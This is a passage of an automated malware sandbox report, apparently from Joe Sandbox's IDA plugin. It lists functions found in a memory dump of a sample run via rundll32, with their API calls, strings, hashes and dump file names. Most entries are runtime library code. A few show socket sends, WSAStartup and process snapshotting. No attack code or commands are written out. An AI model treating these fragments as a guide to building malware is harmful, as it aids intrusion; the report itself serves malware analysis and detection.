_memset.LIBCMT ref: 04194E33

Strings

D, xrefs: 04194E40

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$_strrchr
String ID: D
API String ID: 3722325190-2746444292
Opcode ID: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
Instruction ID: e0015f9a50f2adfa91e8f7cc9dd3b56ad118f3fe447ed4890a5978a216303128
Opcode Fuzzy Hash: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
Instruction Fuzzy Hash: A341EBB29041186BEB24EB64CCC9FEE77B89F54704F0441D9E609A7180DB75AF4ACF61

Function 04161740 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04161758

Part of subcall function 0416217D: std::exception::exception.LIBCMT ref: 04162192
Part of subcall function 0416217D: __CxxThrowException@8.LIBCMT ref: 041621A7
Part of subcall function 0416217D: std::exception::exception.LIBCMT ref: 041621B8

std::_Xinvalid_argument.LIBCPMT ref: 04161776
std::_Xinvalid_argument.LIBCPMT ref: 04161791

Strings

string too long, xrefs: 04161771, 0416178C
invalid string position, xrefs: 04161753

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 4225265588-4289949731
Opcode ID: 4da912f0cb59f26b3a4d5e1c1fb5d42123bbeb22da2426a800fedf1c3fddf02b
Instruction ID: 17b3cf6899041148333443e93326a6c4fd7ced2b50f73e3a11c191eec69ce06e
Opcode Fuzzy Hash: 4da912f0cb59f26b3a4d5e1c1fb5d42123bbeb22da2426a800fedf1c3fddf02b
Instruction Fuzzy Hash: 1621D332304304ABD324DE6CE8D0A6AB7E9AF91755F204A6EE5978B240D771F86087A0

Function 04191FD4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 04191FE7

Part of subcall function 04191F42: ___BuildCatchObjectHelper.LIBCMT ref: 04191F78

_UnwindNestedFrames.LIBCMT ref: 04191FFE
___FrameUnwindToState.LIBCMT ref: 0419200C

Strings

csm, xrefs: 04191FD6
csm, xrefs: 04191FE3, 04191FF8, 0419200B, 04192029, 04192039

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: 00eac62e7d75be61b48ae3a9a3aab69d5460cf4b402ceba85941589b4459527a
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: B101F67100110ABBFF12AF51CC84EEA7FAAEF09394F044454FD5815160DB76E9B1DBA0

Function 04177570 Relevance: 7.7, APIs: 5, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(76232460,76938400,0417B824), ref: 041775A4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 041775BD
_rand.LIBCMT ref: 041775CC
wsprintfA.USER32 ref: 04177641
LeaveCriticalSection.KERNEL32(?,?,?), ref: 04177746

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveVirtual_randwsprintf
String ID:
API String ID: 54394521-0
Opcode ID: 1098f68ae23ab350faa5f17b236be91bef21ad2fbc26c7e93c0f784624a57da8
Instruction ID: 6f6e2dd45c5eb015d77f467097897f8b2bdd0378e3d9afad39f1088e93c35b58
Opcode Fuzzy Hash: 1098f68ae23ab350faa5f17b236be91bef21ad2fbc26c7e93c0f784624a57da8
Instruction Fuzzy Hash: 5451A271600516ABEB15DF69CCC49AAF7B9FF04318F048669E829D7240DB34FA55CBD0

Function 04162E7F Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04162EDA
_memcpy_s.LIBCMT ref: 04162F4B
__read.LIBCMT ref: 04162FAE
__filbuf.LIBCMT ref: 04162FCA

Part of subcall function 04165C8C: __getptd_noexit.LIBCMT ref: 04165C8C

_memset.LIBCMT ref: 0416300B

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
Instruction ID: e6927bb1760a4a36f1cfab6574df5bff12e7cc8b713fc075050c6d4b17c3a209
Opcode Fuzzy Hash: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
Instruction Fuzzy Hash: 0D51B331B00209EBDB24AFA989C469EB7B5AF50324F1586EDE827961D0D770FA70DB50

Function 04175690 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2a4160f2b90d1253b2ff13d71a2806da2d2b6e8187e80e3ab190fb4e39c3a7
Instruction ID: 494fe3cb38ffded81acbdbf99781dbc7bca5c9fff97f04b1bf7fff2b09685db5
Opcode Fuzzy Hash: 7d2a4160f2b90d1253b2ff13d71a2806da2d2b6e8187e80e3ab190fb4e39c3a7
Instruction Fuzzy Hash: DB31A0B1710200AFE720DF69DCC5F2A77FAEB88754F544599FA08CB641E7B1E9008B94

Function 04177130 Relevance: 7.6, APIs: 5, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00002000,00000000), ref: 04177164
Sleep.KERNEL32(0000001E), ref: 04177172
Sleep.KERNEL32(0000001E), ref: 0417718E
send.WS2_32(?,?,00000000,00000000), ref: 041771C1
Sleep.KERNEL32(00000064), ref: 041771CF

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Sleep$send
String ID:
API String ID: 4079979460-0
Opcode ID: 67069bd2e3466cd4c3014f7c2ab9ee3543076b38ac32dfeba1cfa168eab28785
Instruction ID: f2f5f7b9728fc7bb95bcfee7487e648497e5095ac8f9f0d9ed30e32747ac83ad
Opcode Fuzzy Hash: 67069bd2e3466cd4c3014f7c2ab9ee3543076b38ac32dfeba1cfa168eab28785
Instruction Fuzzy Hash: 7321AE71911308ABE720DBA9C8C8B8EBBB5EB44791F2041A5F914D72C0C774B984C790

Function 0416359D Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 041635AB

Part of subcall function 0416375E: __FF_MSGBANNER.LIBCMT ref: 04163777
Part of subcall function 0416375E: __NMSG_WRITE.LIBCMT ref: 0416377E
Part of subcall function 0416375E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0416750C,00000000,00000001,00000000,?,0416B043,00000018,0417C790,0000000C,0416B0D3), ref: 041637A3

_free.LIBCMT ref: 041635BE

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: e281090bbaa04d12bfd87852c5e5766924c1ac4fab2a1958598999ea107a3302
Instruction ID: 104499ac0667f2770cc16ff725efb7ce1b6591ae33bc202d60a0fa8c2010a1ee
Opcode Fuzzy Hash: e281090bbaa04d12bfd87852c5e5766924c1ac4fab2a1958598999ea107a3302
Instruction Fuzzy Hash: 98110D32505219FBDF252F74B88465D3BDAEF40275B124165FC6B9B240EF34FA704694

Function 0416866D Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04168679

Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848

__getptd.LIBCMT ref: 04168690
__amsg_exit.LIBCMT ref: 0416869E
__lock.LIBCMT ref: 041686AE
__updatetlocinfoEx_nolock.LIBCMT ref: 041686C2

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 261bbcfa1496bf12482e82100bd78577a12e22e917f1979ae5c9110d271777a6
Instruction ID: 6e0485965862e0d097dc90b547861cbfab2cd25a3afbde09818ec0e9bc96c3ee
Opcode Fuzzy Hash: 261bbcfa1496bf12482e82100bd78577a12e22e917f1979ae5c9110d271777a6
Instruction Fuzzy Hash: 06F09032946714DBFB21BFA5988574D76E0AF0072CF514589E817AB2D0CB64F8A0CB5A

Function 04161630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0416166A

Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 04162145
Part of subcall function 04162130: __CxxThrowException@8.LIBCMT ref: 0416215A
Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 0416216B

Strings

vector<T> too long, xrefs: 04161665
yxxx, xrefs: 0416167B
yxxx, xrefs: 041616C4

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long$yxxx$yxxx
API String ID: 1823113695-1517697755
Opcode ID: 480f5e82664877bf0eb0b3c68b3c774da91e8ad241fd764b182dd937b799bea6
Instruction ID: 91389a71012d9f6add55cf1c57bb286545d2f0703dc9d0e0aae4b61655c614ae
Opcode Fuzzy Hash: 480f5e82664877bf0eb0b3c68b3c774da91e8ad241fd764b182dd937b799bea6
Instruction Fuzzy Hash: 3A21C8B2E002056FC308DF5DD881A5AB7EAE794315F15462AD9169B384DB78FE508A90

Function 04161490 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 041614BE

Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 04162145
Part of subcall function 04162130: __CxxThrowException@8.LIBCMT ref: 0416215A
Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 0416216B

Strings

yxxx, xrefs: 041614CB
vector<T> too long, xrefs: 041614B9
yxxx, xrefs: 041614A0

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long$yxxx$yxxx
API String ID: 1823113695-1517697755
Opcode ID: a7e18f730f17766ce5fa84f8072c37dc1930e5432ed1072e7bf4caa14295deda
Instruction ID: 5ae7ad9b8dbd67262f27ca05558192abfed8ff6126fb6331e2fc4c2d394c242f
Opcode Fuzzy Hash: a7e18f730f17766ce5fa84f8072c37dc1930e5432ed1072e7bf4caa14295deda
Instruction Fuzzy Hash: DBF09623B040322B871C6C7DEC944BD958797D039531A8639ED13DF7D9EB60FDA1A690

Function 04183C47 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 04183C5B

Part of subcall function 04183926: _free.LIBCMT ref: 04189720

__init_pointers.LIBCMT ref: 04183D0D
__calloc_crt.LIBCMT ref: 04183D7B

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __calloc_crt__init_pointers__mtterm_free
String ID:
API String ID: 3556499859-0
Opcode ID: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
Instruction ID: 17809dccaf08228ffc09d1beb2f2f8b35427beb9297194a3d6c05913b3492211
Opcode Fuzzy Hash: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
Instruction Fuzzy Hash: A4316F71800635AEF711BF75ACC8A793EA6EB69768714C21EE824D72A0DB32D441CF50

Function 0416DF5C Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0416DF90
__isleadbyte_l.LIBCMT ref: 0416DFC3
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 0416DFF4
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 0416E062

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 164bab4373c9952f807c70009c7853e91677207ec290d405182b6beba3bbe8dc
Instruction ID: e489ad6a8de424a0035faaa3c08ddb6006bd3f5b9c69ea4f51c24621963a39b7
Opcode Fuzzy Hash: 164bab4373c9952f807c70009c7853e91677207ec290d405182b6beba3bbe8dc
Instruction Fuzzy Hash: AF31BF31B10256EFDB10DF64D8C59AE7BB6AF01310F0986ECF4568B190E331E9A1DB51

Function 04173FC0 Relevance: 6.1, APIs: 4, Instructions: 69stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04173FD3
lstrcatA.KERNEL32(041A8238,0417BCE4,?,?,00000000,00000000,?,04174334,00000000,?,?,?,?,?,?,762323A0), ref: 0417406B

Part of subcall function 041734F0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,041A6A00,00000000,?,?,04173FFE), ref: 04173501

lstrcatA.KERNEL32(041A8238,0417BC04,?,00000000,00000000,?,04174334,00000000,?,?,?,?,?,?,762323A0), ref: 04174017
lstrcatA.KERNEL32(041A8238,0417B7B4,?,00000000,00000000,?,04174334,00000000,?,?,?,?,?,?,762323A0), ref: 04174023

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: lstrcat$CreateSnapshotToolhelp32_memset
String ID:
API String ID: 2821338896-0
Opcode ID: 30d1913c5fa55ad8e92bb9c5a846b3c7d8bf47c5e918474cda198133c9d23d72
Instruction ID: 4fb298e0ae8d33c0de8edd82919f7feeab6522397a34d7c17ef867572a404719
Opcode Fuzzy Hash: 30d1913c5fa55ad8e92bb9c5a846b3c7d8bf47c5e918474cda198133c9d23d72
Instruction Fuzzy Hash: 0A112B79B4030567FA106BA95CC6E673378DB8179CF094055FD4AA7101EB70F834CBA1

Function 04177460 Relevance: 6.1, APIs: 4, Instructions: 51networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 041774B1
InitializeCriticalSection.KERNEL32(?), ref: 041774BE
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 041774C9
__time64.LIBCMT ref: 041774EC

Part of subcall function 041627AA: GetSystemTimeAsFileTime.KERNEL32(041749EE,?,?,?,041749EE,?), ref: 041627B5
Part of subcall function 041627AA: __aulldiv.LIBCMT ref: 041627D5

Part of subcall function 04162777: __getptd.LIBCMT ref: 0416277C

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Time$CreateCriticalEventFileInitializeSectionStartupSystem__aulldiv__getptd__time64
String ID:
API String ID: 2538592855-0
Opcode ID: 6e702ef2b39ac16988d525f64c5c8c28526309ff00ef902e5e49bc3fcddaa1bb
Instruction ID: fbd21a0b46e4c18b5251cae550b83e1c19e158344c32f0f6ee309a9cfa100d87
Opcode Fuzzy Hash: 6e702ef2b39ac16988d525f64c5c8c28526309ff00ef902e5e49bc3fcddaa1bb
Instruction Fuzzy Hash: 7F1128B0900B049FD320DF7A89C4A96FBF8FB08304F404A6EA59F83641D734B5488F51

Function 04189DBF Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04189DCB

Part of subcall function 04183A90: __getptd_noexit.LIBCMT ref: 04183A93
Part of subcall function 04183A90: __amsg_exit.LIBCMT ref: 04183AA0

__amsg_exit.LIBCMT ref: 04189DEB
__lock.LIBCMT ref: 04189DFB
_free.LIBCMT ref: 04189E2B

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
Instruction ID: 6a5440d8ece5574f9928549cfe99240652c25b066613e62cb82e436cd316007c
Opcode Fuzzy Hash: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
Instruction Fuzzy Hash: 3D01C0B1E10636EBEB21BB6888C476EBBA0BF00714F04415DE804A7280CB34B942DFC5

Function 04181EA6 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04181EC0

Part of subcall function 04182C06: __FF_MSGBANNER.LIBCMT ref: 04182C1F
Part of subcall function 04182C06: __NMSG_WRITE.LIBCMT ref: 04182C26

std::exception::exception.LIBCMT ref: 04181EF5
std::exception::exception.LIBCMT ref: 04181F0F
__CxxThrowException@8.LIBCMT ref: 04181F20

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
Instruction ID: 33ab5867acc5f7a28316ff5a4bc5b45ab4b552b08465cd1c928901348bf6a995
Opcode Fuzzy Hash: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
Instruction Fuzzy Hash: E3F0D176A00219BAEB16FB54CCC4AAE3BB9FF00608F44055CDD15AA091CB75EB428E52

Function 04173720 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04173738
CreateThread.KERNEL32(00000000,00000000,Function_00013690,?,00000000,00000000), ref: 04173752
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04173760
CloseHandle.KERNEL32(?), ref: 0417376A

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 96a8b86c2c3b6e578259b07a2f94d062fbf2640e0b2f1d91fdc3d0ea0d38b293
Instruction ID: f7761d9e1c089e7f54207cbc0a57ccd5a829c45f4a391733d1a6359dd3692ee9
Opcode Fuzzy Hash: 96a8b86c2c3b6e578259b07a2f94d062fbf2640e0b2f1d91fdc3d0ea0d38b293
Instruction Fuzzy Hash: F2F0B4B5E94318BBE710DBA49C4AF9E7B78EB04B10F200255FA14A73C0D6B46A048BD4

Function 04161510 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04161584
std::_Xinvalid_argument.LIBCPMT ref: 0416159F

Part of subcall function 04161740: std::_Xinvalid_argument.LIBCPMT ref: 04161758
Part of subcall function 04161740: std::_Xinvalid_argument.LIBCPMT ref: 04161776
Part of subcall function 04161740: std::_Xinvalid_argument.LIBCPMT ref: 04161791

Strings

string too long, xrefs: 0416157F, 0416159A

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: 9e68f22dae44218886d4e86725cd8febdda5f1cfc95d43b88028fe551f175dc2
Instruction ID: 04474335428d9332bdf5bf717db1b8ef1b6315e5c84ba26580dd46f669ed0444
Opcode Fuzzy Hash: 9e68f22dae44218886d4e86725cd8febdda5f1cfc95d43b88028fe551f175dc2
Instruction Fuzzy Hash: 2231CB72304210ABD724DD6CE8D09AAF7EADF92754B104A2AF153CB640D771F8618794

Function 04191D4D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04191832: __getptd.LIBCMT ref: 04191838
Part of subcall function 04191832: __getptd.LIBCMT ref: 04191848

__getptd.LIBCMT ref: 04191D5C

Part of subcall function 04183A90: __getptd_noexit.LIBCMT ref: 04183A93
Part of subcall function 04183A90: __amsg_exit.LIBCMT ref: 04183AA0

__getptd.LIBCMT ref: 04191D6A

Strings

csm, xrefs: 04191D78

Memory Dump Source

